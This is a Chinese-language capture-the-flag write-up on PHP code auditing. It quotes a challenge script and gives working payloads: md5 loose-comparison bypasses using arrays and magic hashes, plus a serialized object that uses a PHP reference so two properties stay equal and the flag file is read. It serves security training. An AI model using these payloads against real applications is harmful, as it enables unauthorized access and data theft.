知识点:代码审计,php反序列化
<?php
/*** Created by PhpStorm.* User: jinzhao* Date: 2019/10/6* Time: 8:04 PM*/highlight_file(__FILE__);class BUU {
public $correct = "";public $input = "";public function __destruct() {
try {
$this->correct = base64_encode(uniqid());if($this->correct === $this->input) {
echo file_get_contents("/flag");}} catch (Exception $e) {
}}
}if($_GET['pleaseget'] === '1') {
if($_POST['pleasepost'] === '2') {
if(md5($_POST['md51']) == md5($_POST['md52']) && $_POST['md51'] != $_POST['md52']) {
unserialize($_POST['obj']);}}
}其中GET和POST传参都容易处理,第三层的md5弱碰撞可以使用数组绕过或者==弱比较绕过
md51[]=1&md52[]=2
最后一步php反序列化需要满足$this->correct === $this->input
因为每次都会执行$this->correct = base64_encode(uniqid());,所以我们不能将input设为具体的值,而是在序列化执行,令input=&correct
序列化对象
<?phpclass BUU{
public $correct = "";public $input = "";
}$a = new BUU();
$a->input = &$a->correct;
echo serialize($a);
结果
O:3:"BUU":2:{s:7:"correct";s:0:"";s:5:"input";R:2;}
payload:
GET传参
?pleaseget=1POST传参
pleasepost=2&md51[]=1&md52[]=2&obj=O:3:"BUU":2:{
s:7:"correct";s:0:"";s:5:"input";R:2;}
或者
pleasepost=2&md51=QNKCDZO&md52=s155964671a&obj=O:3:"BUU":2:{
s:7:"correct";s:0:"";s:5:"input";R:2;}
或者利用php弱比较的特性传参
md51=QNKCDZO&md52=s155964671a
